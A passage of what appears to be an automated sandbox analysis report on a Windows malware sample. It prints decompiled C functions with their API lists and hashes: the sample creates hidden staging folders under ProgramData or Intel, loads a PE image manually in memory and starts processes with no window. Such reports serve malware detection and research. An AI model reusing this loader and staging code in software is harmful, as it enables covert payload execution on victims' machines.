            					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
            						L2:
            						_t55 = 1;
            						return _t55;
            					} else {
            						GetTempPathW(0x104,  &_v724);
            						if(wcsrchr( &_v724, 0x5c) != 0) {
            							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
            						}
            						_t65 = E00401AF6( &_v724,  &_v204, _a4);
            						asm("sbb eax, eax");
            						return  ~( ~_t65);
            					}
            				}
            				_t72 = E00401AF6( &_v724,  &_v204, _a4);
            				_t98 = _t98 + 0xc;
            				if(_t72 == 0) {
            					goto L3;
            				}
            				goto L2;
            			}

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
            • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
            • GetFileAttributesW.KERNEL32(?), ref: 00401C10
            • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
            • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
            • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
            • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
              • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
              • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
              • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
              • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
            • String ID: %s\Intel$%s\ProgramData
            • API String ID: 3806094219-198707228
            • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
            • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
            • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
            • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
            				signed int _v8;
            				intOrPtr _v40;
            				char _v44;
            				void* _t82;
            				struct HINSTANCE__* _t83;
            				intOrPtr* _t84;
            				intOrPtr _t89;
            				void* _t91;
            				void* _t104;
            				void _t107;
            				intOrPtr _t116;
            				intOrPtr _t124;
            				signed int _t125;
            				signed char _t126;
            				intOrPtr _t127;
            				signed int _t134;
            				intOrPtr* _t145;
            				signed int _t146;
            				intOrPtr* _t151;
            				intOrPtr _t152;
            				short* _t153;
            				signed int _t155;
            				void* _t156;
            				intOrPtr _t157;
            				void* _t158;
            				void* _t159;
            				void* _t160;
            
            				_v8 = _v8 & 0x00000000;
            				_t3 =  &_a8; // 0x40213f
            				if(E00402457( *_t3, 0x40) == 0) {
            					L37:
            					return 0;
            				}
            				_t153 = _a4;
            				if( *_t153 == 0x5a4d) {
            					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
            						goto L37;
            					}
            					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
            					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
            						goto L2;
            					} else {
            						_t9 = _t151 + 0x38; // 0x68004021
            						_t126 =  *_t9;
            						if((_t126 & 0x00000001) != 0) {
            							goto L2;
            						}
            						_t12 = _t151 + 0x14; // 0x4080e415
            						_t13 = _t151 + 6; // 0x4080e0
            						_t146 =  *_t13 & 0x0000ffff;
            						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
            						if(_t146 <= 0) {
            							L16:
            							_t83 = GetModuleHandleA("kernel32.dll");
            							if(_t83 == 0) {
            								goto L37;
            							}
            							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
            							_t159 = _t158 + 0xc;
            							if(_t84 == 0) {
            								goto L37;
            							}
            							 *_t84( &_v44);
            							_t86 = _v40;
            							_t23 = _t151 + 0x50; // 0xec8b55c3
            							_t25 = _t86 - 1; // 0xec8b55c2
            							_t27 = _t86 - 1; // -1
            							_t134 =  !_t27;
            							_t155 =  *_t23 + _t25 & _t134;
            							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
            								goto L2;
            							}
            							_t31 = _t151 + 0x34; // 0x85680040
            							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
            							_t127 = _t89;
            							_t160 = _t159 + 0x14;
            							if(_t127 != 0) {
            								L21:
            								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
            								_t156 = _t91;
            								if(_t156 != 0) {
            									 *((intOrPtr*)(_t156 + 4)) = _t127;
            									_t38 = _t151 + 0x16; // 0xc3004080
            									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
            									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
            									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
            									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
            									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
            									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
            									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
            									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
            									_t54 = _t151 + 0x54; // 0x8328ec83
            									if(E00402457(_a8,  *_t54) == 0) {
            										L36:
            										E004029CC(_t156);
            										goto L37;
            									}
            									_t57 = _t151 + 0x54; // 0x8328ec83
            									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
            									_t59 = _t151 + 0x54; // 0x8328ec83
            									_a32 = _t104;
            									memcpy(_t104, _a4,  *_t59);
            									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
            									 *_t156 = _t107;
            									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
            									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
            										goto L36;
            									}
            									_t68 = _t151 + 0x34; // 0x85680040
            									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
            									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
            										_t152 = 1;
            										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
            									} else {
            										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
            										_t152 = 1;
            									}
            									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
            										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
            										if(_t116 == 0) {
            											 *((intOrPtr*)(_t156 + 0x34)) = 0;
            											L41:
            											return _t156;
            										}
            										if( *(_t156 + 0x14) == 0) {
            											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
            											goto L41;
            										}
            										_push(0);
            										_push(_t152);
            										_push(_t127);
            										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
            											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
            											goto L41;
            										}
            										SetLastError(0x45a);
            									}
            									goto L36;
            								}
            								_a16(_t127, _t91, 0x8000, _a32);
            								L23:
            								SetLastError(0xe);
            								L3:
            								goto L37;
            							}
            							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
            							_t160 = _t160 + 0x14;
            							if(_t127 == 0) {
            								goto L23;
            							}
            							goto L21;
            						}
            						_t145 = _t82 + 0xc;
            						do {
            							_t157 =  *((intOrPtr*)(_t145 + 4));
            							_t124 =  *_t145;
            							if(_t157 != 0) {
            								_t125 = _t124 + _t157;
            							} else {
            								_t125 = _t124 + _t126;
            							}
            							if(_t125 > _v8) {
            								_v8 = _t125;
            							}
            							_t145 = _t145 + 0x28;
            							_t146 = _t146 - 1;
            						} while (_t146 != 0);
            						goto L16;
            					}
            				}
            				L2:
            				SetLastError(0xc1);
            				goto L3;
            			}

            APIs
              • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
            • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
            • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
            • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
              • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
            • SetLastError.KERNEL32(0000045A), ref: 00402430
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
            • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
            • API String ID: 1900561814-3657104962
            • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
            • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
            • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
            • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
            				void* _t15;
            				WCHAR* _t17;
            
            				CreateDirectoryW(_a4, 0);
            				if(SetCurrentDirectoryW(_a4) == 0) {
            					L2:
            					return 0;
            				}
            				_t17 = _a8;
            				CreateDirectoryW(_t17, 0);
            				if(SetCurrentDirectoryW(_t17) != 0) {
            					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
            					if(_a12 != 0) {
            						_push(_t17);
            						swprintf(_a12, L"%s\\%s", _a4);
            					}
            					_t15 = 1;
            					return _t15;
            				}
            				goto L2;
            			}

            APIs
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
            • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
            • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: Directory$AttributesCreateCurrentFile$swprintf
            • String ID: %s\%s
            • API String ID: 1036847564-4073750446
            • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
            • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
            • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
            • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
            				struct _PROCESS_INFORMATION _v20;
            				struct _STARTUPINFOA _v88;
            				signed int _t32;
            				intOrPtr _t37;
            
            				_t32 = 0x10;
            				_v88.cb = 0x44;
            				memset( &(_v88.lpReserved), 0, _t32 << 2);
            				_v20.hProcess = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_t37 = 1;
            				_v88.wShowWindow = 0;
            				_v88.dwFlags = _t37;
            				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
            					return 0;
            				}
            				if(_a8 != 0) {
            					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
            						TerminateProcess(_v20.hProcess, 0xffffffff);
            					}
            					if(_a12 != 0) {
            						GetExitCodeProcess(_v20.hProcess, _a12);
            					}
            				}
            				CloseHandle(_v20);
            				CloseHandle(_v20.hThread);
            				return _t37;
            			}

            APIs
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
            • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
            • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
            • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
            • CloseHandle.KERNEL32(?), ref: 004010EC
            • CloseHandle.KERNEL32(?), ref: 004010F1
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
            • String ID: D
            • API String ID: 786732093-2746444292
            • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
            • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
            • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
            • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			_entry_(void* __ebx, void* __edi, void* __esi) {
            				CHAR* _v8;
            				intOrPtr* _v24;
            				intOrPtr _v28;
            				struct _STARTUPINFOA _v96;
            				int _v100;
            				char** _v104;
            				int _v108;
            				void _v112;
            				char** _v116;
            				intOrPtr* _v120;
            				intOrPtr _v124;
            				intOrPtr* _t23;
            				intOrPtr* _t24;
            				void* _t27;
            				void _t29;
            				intOrPtr _t36;
            				signed int _t38;
            				int _t40;
            				intOrPtr* _t41;
            				intOrPtr _t42;
            				intOrPtr _t46;
            				intOrPtr _t47;
            				intOrPtr _t49;
            				intOrPtr* _t55;
            				intOrPtr _t58;
            				intOrPtr _t61;
            
            				_push(0xffffffff);
            				_push(0x40d488);
            				_push(0x4076f4);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t58;
            				_v28 = _t58 - 0x68;
            				_v8 = 0;
            				__set_app_type(2);
            				 *0x40f94c =  *0x40f94c | 0xffffffff;
            				 *0x40f950 =  *0x40f950 | 0xffffffff;
            				_t23 = __p__fmode();
            				_t46 =  *0x40f948; // 0x0
            				 *_t23 = _t46;
            				_t24 = __p__commode();
            				_t47 =  *0x40f944; // 0x0
            				 *_t24 = _t47;
            				 *0x40f954 = _adjust_fdiv;
            				_t27 = E0040793F( *_adjust_fdiv);
            				_t61 =  *0x40f870; // 0x1
            				if(_t61 == 0) {
            					__setusermatherr(E0040793C);
            				}
            				E0040792A(_t27);
            				_push(0x40e00c);
            				_push(0x40e008);
            				L00407924();
            				_t29 =  *0x40f940; // 0x0
            				_v112 = _t29;
            				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
            				_push(0x40e004);
            				_push(0x40e000);
            				L00407924();
            				_t55 =  *_acmdln;
            				_v120 = _t55;
            				if( *_t55 != 0x22) {
            					while(1) {
            						__eflags =  *_t55 - 0x20;
            						if(__eflags <= 0) {
            							goto L7;
            						}
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				} else {
            					do {
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            						_t42 =  *_t55;
            					} while (_t42 != 0 && _t42 != 0x22);
            					if( *_t55 == 0x22) {
            						L6:
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				}
            				L7:
            				_t36 =  *_t55;
            				if(_t36 != 0 && _t36 <= 0x20) {
            					goto L6;
            				}
            				_v96.dwFlags = 0;
            				GetStartupInfoA( &_v96);
            				_t69 = _v96.dwFlags & 0x00000001;
            				if((_v96.dwFlags & 0x00000001) == 0) {
            					_t38 = 0xa;
            				} else {
            					_t38 = _v96.wShowWindow & 0x0000ffff;
            				}
            				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
            				_v108 = _t40;
            				exit(_t40);
            				_t41 = _v24;
            				_t49 =  *((intOrPtr*)( *_t41));
            				_v124 = _t49;
            				_push(_t41);
            				_push(_t49);
            				L0040791E();
            				return _t41;
            			}

            APIs
            • __set_app_type.MSVCRT(00000002), ref: 004077E7
            • __p__fmode.MSVCRT ref: 004077FC
            • __p__commode.MSVCRT ref: 0040780A
            • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
            • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
            • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
            • String ID:
            • API String ID: 3626615345-0
            • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
            • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
            • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
            • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E00407831(CHAR* __ebx) {
            				void* _t19;
            				void _t21;
            				intOrPtr _t28;
            				signed int _t30;
            				int _t32;
            				intOrPtr* _t33;
            				intOrPtr _t34;
            				CHAR* _t35;
            				intOrPtr _t38;
            				intOrPtr* _t41;
            				void* _t42;
            
            				_t35 = __ebx;
            				__setusermatherr(E0040793C);
            				E0040792A(_t19);
            				_push(0x40e00c);
            				_push(0x40e008);
            				L00407924();
            				_t21 =  *0x40f940; // 0x0
            				 *(_t42 - 0x6c) = _t21;
            				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
            				_push(0x40e004);
            				_push(0x40e000);
            				L00407924();
            				_t41 =  *_acmdln;
            				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
            				if( *_t41 != 0x22) {
            					while(1) {
            						__eflags =  *_t41 - 0x20;
            						if(__eflags <= 0) {
            							goto L6;
            						}
            						_t41 = _t41 + 1;
            						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
            					}
            				} else {
            					do {
            						_t41 = _t41 + 1;
            						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
            						_t34 =  *_t41;
            					} while (_t34 != _t35 && _t34 != 0x22);
            					if( *_t41 == 0x22) {
            						L5:
            						_t41 = _t41 + 1;
            						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
            					}
            				}
            				L6:
            				_t28 =  *_t41;
            				if(_t28 != _t35 && _t28 <= 0x20) {
            					goto L5;
            				}
            				 *(_t42 - 0x30) = _t35;
            				GetStartupInfoA(_t42 - 0x5c);
            				_t52 =  *(_t42 - 0x30) & 0x00000001;
            				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
            					_t30 = 0xa;
            				} else {
            					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
            				}
            				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
            				 *(_t42 - 0x68) = _t32;
            				exit(_t32);
            				_t33 =  *((intOrPtr*)(_t42 - 0x14));
            				_t38 =  *((intOrPtr*)( *_t33));
            				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
            				_push(_t33);
            				_push(_t38);
            				L0040791E();
            				return _t33;
            			}

            APIs
            • __setusermatherr.MSVCRT(0040793C), ref: 00407836
              • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
            • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
            • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
            • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
            • GetStartupInfoA.KERNEL32(?), ref: 004078BE
            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
            • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
            • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
            • String ID:
            • API String ID: 2141228402-0
            • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
            • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
            • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
            • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			E004027DF(signed int* _a4) {
            				intOrPtr _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr* _t50;
            				intOrPtr _t53;
            				intOrPtr _t55;
            				void* _t58;
            				void _t60;
            				signed int _t63;
            				signed int _t67;
            				intOrPtr _t68;
            				void* _t73;
            				signed int _t75;
            				intOrPtr _t87;
            				intOrPtr* _t88;
            				intOrPtr* _t90;
            				void* _t91;
            
            				_t90 = _a4;
            				_t2 = _t90 + 4; // 0x4be8563c
            				_t87 =  *_t2;
            				_t50 =  *_t90 + 0x80;
            				_t75 = 1;
            				_v16 = _t87;
            				_v12 = _t75;
            				if( *((intOrPtr*)(_t50 + 4)) != 0) {
            					_t73 =  *_t50 + _t87;
            					if(IsBadReadPtr(_t73, 0x14) != 0) {
            						L25:
            						return _v12;
            					}
            					while(1) {
            						_t53 =  *((intOrPtr*)(_t73 + 0xc));
            						if(_t53 == 0) {
            							goto L25;
            						}
            						_t8 = _t90 + 0x30; // 0xc085d0ff
            						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
            						_v8 = _t55;
            						if(_t55 == 0) {
            							SetLastError(0x7e);
            							L23:
            							_v12 = _v12 & 0x00000000;
            							goto L25;
            						}
            						_t11 = _t90 + 0xc; // 0x317459c0
            						_t14 = _t90 + 8; // 0x85000001
            						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
            						if(_t58 == 0) {
            							_t40 = _t90 + 0x30; // 0xc085d0ff
            							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
            							SetLastError(0xe);
            							goto L23;
            						}
            						_t15 = _t90 + 0xc; // 0x317459c0
            						 *(_t90 + 8) = _t58;
            						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
            						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
            						_t60 =  *_t73;
            						if(_t60 == 0) {
            							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
            							_a4 = _t88;
            						} else {
            							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
            							_a4 = _t60 + _t87;
            						}
            						while(1) {
            							_t63 =  *_a4;
            							if(_t63 == 0) {
            								break;
            							}
            							if((_t63 & 0x80000000) == 0) {
            								_t32 = _t90 + 0x30; // 0xc085d0ff
            								_push( *_t32);
            								_t67 = _t63 + _v16 + 2;
            							} else {
            								_t30 = _t90 + 0x30; // 0xc085d0ff
            								_push( *_t30);
            								_t67 = _t63 & 0x0000ffff;
            							}
            							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
            							_t91 = _t91 + 0xc;
            							 *_t88 = _t68;
            							if(_t68 == 0) {
            								_v12 = _v12 & 0x00000000;
            								break;
            							} else {
            								_a4 =  &(_a4[1]);
            								_t88 = _t88 + 4;
            								continue;
            							}
            						}
            						if(_v12 == 0) {
            							_t45 = _t90 + 0x30; // 0xc085d0ff
            							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
            							SetLastError(0x7f);
            							goto L25;
            						}
            						_t73 = _t73 + 0x14;
            						if(IsBadReadPtr(_t73, 0x14) == 0) {
            							_t87 = _v16;
            							continue;
            						}
            						goto L25;
            					}
            					goto L25;
            				}
            				return _t75;
            			}

            APIs
            • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
            • realloc.MSVCRT(85000001,317459C0), ref: 00402854
            • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: Read$realloc
            • String ID: ?!@
            • API String ID: 1241503663-708128716
            • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
            • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
            • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
            • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E00401225(intOrPtr _a4) {
            				signed int _v8;
            				long _v12;
            				void _v410;
            				long _v412;
            				long _t34;
            				signed int _t42;
            				intOrPtr _t44;
            				signed int _t45;
            				signed int _t48;
            				int _t54;
            				signed int _t56;
            				signed int _t60;
            				signed int _t61;
            				signed int _t62;
            				void* _t71;
            				signed short* _t72;
            				void* _t76;
            				void* _t77;
            
            				_t34 =  *0x40f874; // 0x0
            				_v412 = _t34;
            				_t56 = 0x63;
            				_v12 = 0x18f;
